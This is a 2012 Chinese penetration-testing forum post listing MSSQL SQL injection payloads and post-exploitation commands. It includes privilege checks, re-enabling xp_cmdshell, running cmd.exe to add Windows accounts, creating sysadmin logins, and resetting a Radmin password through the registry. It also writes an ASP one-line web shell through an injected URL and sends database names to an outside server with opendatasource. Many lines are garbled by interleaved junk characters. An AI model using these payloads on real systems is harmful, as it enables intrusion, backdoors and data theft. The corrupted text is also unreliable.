中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
! Q0 S9 j5 P; [1 oand 1=(Select IS_MEMBER('db_owner'))0 x9 Y" G  g* |  d4 [
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--, B/ X$ }' f7 G$ f  h

# P; ]& ]. X" d/ c  k//检测是否有读取某数据库的权限
0 J. U  F% Q5 ], ~* v, j5 p3 g% Tand 1= (Select HAS_DBACCESS('master'))
* H6 I6 W. d3 y9 z, B$ k# xAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
3 j8 p: U7 t1 U1 N% a
6 R4 f+ |, l" y' o9 N* B6 v( \. ]; S! T% ?% \8 ~* ?
数字类型7 N: D) r" q, T2 e
and char(124)%2Buser%2Bchar(124)=0
* L. _! |+ f& v+ c) S4 b' C* l( i8 D' U/ O
字符类型
1 F1 t" _5 C" C1 K0 b' and char(124)%2Buser%2Bchar(124)=0 and ''='
* }& }( U5 o2 w% p$ j, `. i$ ~4 D. E9 K& ]' P( E
搜索类型
. C6 {& @% m/ V" X' and char(124)%2Buser%2Bchar(124)=0 and '%'='/ ]: E, E3 b7 Q5 i
- Y' h  B# g" b8 r9 R. b
爆用户名
' G0 f" M) z: G# D- D2 e7 Oand user>06 D: L. c% [8 \* y- D
' and user>0 and ''='# }5 W6 U8 o+ W# x% ?% N
7 T  Z2 ~3 T/ S  c7 B% w
检测是否为SA权限& K8 y- g: F9 V$ d. T
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--' L; m, s5 c& R  x" Q) Y: ~) ?9 l
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" D) S9 u! U% S: O1 W- ?/ b; b6 U( S

' S- \3 }% z! O/ z6 U检测是不是MSSQL数据库/ z" G# r9 @4 ]4 F, F9 M6 x
and exists (select * from sysobjects);--# e$ z0 a8 u: I9 A

& q4 b( L& q% U检测是否支持多行
9 H: r0 D* k: V" \;declare @d int;--7 B5 ~) m" t& z

3 H7 U3 N' U* a( _% c3 n恢复 xp_cmdshell
5 M. o( G% @8 m;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--. q+ G! G; J/ f: u/ j8 w; Z

+ M1 T6 ?6 b8 a  N) b
$ [- t0 R4 e0 ]5 Y1 E1 K$ lselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
, @: Z7 n" {1 K9 u0 S# ]2 O
% g) H+ Q  T# @* O7 ^//-----------------------
+ ?, h, j2 f2 s  J! d//       执行命令
6 G% t  r; }' O& q1 P1 |3 a$ S//-----------------------. A2 |- t- H( D2 x3 {/ ?
首先开启沙盘模式:! ]4 L1 ?, `5 v$ G5 m& \
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1$ k& {7 t( h4 l' ~
! u2 D% i% y, V) y0 q
然后利用jet.oledb执行系统命令3 J! O' e' e4 p0 j) d" K2 c' \
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
$ g( M! }: U4 s0 l: S! q4 m0 ^% [% W0 ?
执行命令
- L& D7 H+ D4 B7 y" w. @;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--/ a& D, D- j6 x, B5 }
% G- r' Y9 S# n0 T7 U% q. O8 v. B
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
. s* k+ n* Y  k/ i; {- Z$ g2 U( v  l
判断xp_cmdshell扩展存储过程是否存在:
" W$ N7 G  B( |! vhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')' h9 k/ O$ m* s. Q- ^
0 G( o" X0 z% M
写注册表
4 g3 u7 V9 L! yexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',10 a1 d2 c0 g  M% s; r

3 e8 {$ U: @9 G% \1 f; sREG_SZ
% T6 X& U$ r! F8 x; n7 a5 J$ }7 G0 a$ k1 D; @3 s2 W8 ?
读注册表" k0 A5 {+ J/ c2 h) ]5 d
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
* d: C' d7 y5 e, B9 f2 [
* Y1 f# T8 b7 Y6 r% T+ L  Y4 l读取目录内容6 f) f6 C, r8 J. _: h5 Z# D% k/ S
exec master..xp_dirtree 'c:\winnt\system32\',1,1
7 z1 P/ t. @) B1 U, M( X- P! C9 r5 B

2 J$ ^: j# E' p3 t- M数据库备份
/ y& d7 U3 J# y6 dbackup database pubs to disk = 'c:\123.bak'- B9 c" }) p) S' k4 H; ^

- k, C# y& Z3 ~7 t- k4 |2 j//爆出长度# R& P3 S2 Y- V0 e( T3 F0 H
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--6 }$ s- U( R, X) d7 l
  Q. b6 ~  l% b% h4 E

5 {' b! o2 n0 j6 D3 i/ [& A. X: W, A2 `" x0 r+ U: z' O
更改sa口令方法:用sql综合利用工具连接后,执行命令:+ {' ]/ d: h" j: c$ G+ h' G6 X
exec sp_password NULL,'新密码','sa'
0 ]( \9 T. o0 H) c, Q. _/ I# @. `9 s  y. v! I3 t
添加和删除一个SA权限的用户test:# y; h! i1 @; n  N
exec master.dbo.sp_addlogin test,9530772% `( u" Q) }" Z1 e0 }8 w2 U
exec master.dbo.sp_addsrvrolemember test,sysadmin1 d: n! `' \' Q+ c! v. R9 Q
& J* @* d" q( L7 H* t( }
删除扩展存储过过程xp_cmdshell的语句:9 s) v" X  \% {. N' r) f
exec sp_dropextendedproc 'xp_cmdshell'
0 U6 u- J, c( z% S, Y8 U
4 n: k$ ~: l  ?4 ^; J添加扩展存储过过程9 l2 l+ L( H+ R- D, T6 |4 \
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
- ?- B* l% n- J* N3 A% [GRANT exec On xp_proxiedadata TO public
( h- M6 k  ~7 A, B1 l
7 [/ M8 j, H; \5 i& I  E$ ~5 g. k) O8 E' b2 R' d
停掉或激活某个服务。, _+ T1 ^1 t' I$ B* I; t# A

6 {$ u; C0 ~4 ^! c- qexec master..xp_servicecontrol 'stop','schedule'% D8 T- g) c: v4 {5 O
exec master..xp_servicecontrol 'start','schedule'7 M. V- ?+ v" P1 b

# B. K1 M- w0 {- E1 A1 p( udbo.xp_subdirs
" Q6 o6 J; {8 p1 }7 w
4 {, P1 N- O$ [7 J3 r  o7 q7 q只列某个目录下的子目录。- G0 z# K- r4 f6 p( n
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
. h0 J" g1 d* l+ T* h- d+ O* ~9 l2 |+ m: l3 m) q
dbo.xp_makecab- a6 i+ v- }  _* m
4 b1 a* B# i  _; R" R& r
将目标多个档案压缩到某个目标档案之内。
1 R9 H. U: U3 Q* S. ~' z# Q# {# ?所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
+ L0 C" A; r! p9 f* g( x) [5 u2 Y( C7 y+ G8 H/ U
dbo.xp_makecab
. u% w- C  z6 k3 J& D'c:\test.cab','mszip',1,
& g: U! T" I5 A( V'C:\Inetpub\wwwroot\SQLInject\login.asp'," N& N+ P4 s/ u( e4 K
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
1 L, I. f% v# F/ Q$ P' j* B  T& `8 P$ c
xp_terminate_process
8 S0 w7 r- u; d* h: g( F- m, x1 b( [5 Z" R2 D7 @
停掉某个执行中的程序,但赋予的参数是 Process ID。2 D( @) o6 ]- L) \# q% S$ A
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID7 u& ?& o& V7 }5 _9 w- q9 A( e
2 c+ S- ?9 w1 {" I$ g7 k7 i
xp_terminate_process 24846 O: O" y& `" I2 F

7 P, j8 @" K" qxp_unpackcab
; x4 B( E1 c, V" v+ `5 N
. o) H% P0 i% |  J% O解开压缩档。0 P0 ^# `! ^' z

0 W/ ~: W' d- k" O/ vxp_unpackcab 'c:\test.cab','c:\temp',16 k2 Q3 }; O5 V: `0 B
- A9 g7 z4 w+ c7 D5 Y% C! _

4 K4 ^% v1 ^9 g7 S某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
+ X5 v# B, m8 p/ Z# ~& r0 q0 e: w5 p+ L; J
create database lcx;
  L0 N( B; n8 v  oCreate TABLE ku(name nvarchar(256) null);+ \9 H$ T. b1 p  W, @
Create TABLE biao(id int NULL,name nvarchar(256) null);
  `! X! R' ^7 _4 s1 z1 \2 h. C# Q0 |0 P3 @6 F1 ^& n
//得到数据库名
# w# {5 w* P+ b" X  |8 Kinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
7 x* ~& [7 C( B; A. M0 q5 x( s' Y
3 ~3 Y$ |# G! \5 u2 S6 v' G, E6 G, ?0 V4 d3 f6 ?1 d' \
//在Master中创建表,看看权限怎样
, L6 l1 q% i1 d' `: B! JCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--$ u/ S; I) ?0 `( e% o

' z+ o5 h/ d& Y) M8 x6 H用 sp_makewebtask直接在web目录里写入一句话马:
7 W, V5 @) }& H( h7 S( r6 n8 Qhttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--7 ^: h( O$ g! r
- g5 A8 i. v7 J  E+ ^. d
//更新表内容
* N3 m$ {: ], h8 O' }! s2 ?$ E# \, YUpdate films SET kind = 'Dramatic' Where id = 123- x3 H- n' C3 t+ c

' A: ^; ?7 a) O! t0 ^1 @//删除内容
  j# L( m3 n) a0 [' _delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2